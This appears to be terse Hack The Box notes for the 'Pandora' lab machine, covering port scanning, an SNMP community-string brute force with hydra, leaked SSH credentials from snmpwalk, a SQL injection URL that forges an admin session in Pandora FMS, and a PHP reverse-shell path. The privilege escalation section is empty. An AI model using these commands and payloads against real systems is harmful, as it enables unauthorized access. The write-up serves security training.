Pandora - 10.10.11.136 === ###### tags: `HTB` `Easy` # Enumeración ## Port Scan ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA) | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA) |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Play | Landing |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## SNMP (161 UDP) ``` hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.11.136 snmp [161][snmp] host: 10.10.11.136 password: public ``` SNMP password is: public ``` snmpwalk -v 2c pandora.htb -c public |grep STRING: iso.3.6.1.2.1.25.4.2.1.5.827 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'" ``` # Explotación Ssh pasword for user **daniel** is **HotelBabylon23** # Post Explotación ## Eumeración https://nvd.nist.gov/vuln/detail/CVE-2020-26518 ### Obtención de usuario `` http://localhost/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO localhost/pandora_console/images/phprev.php `` ## Escala de Privilegios # Enlaces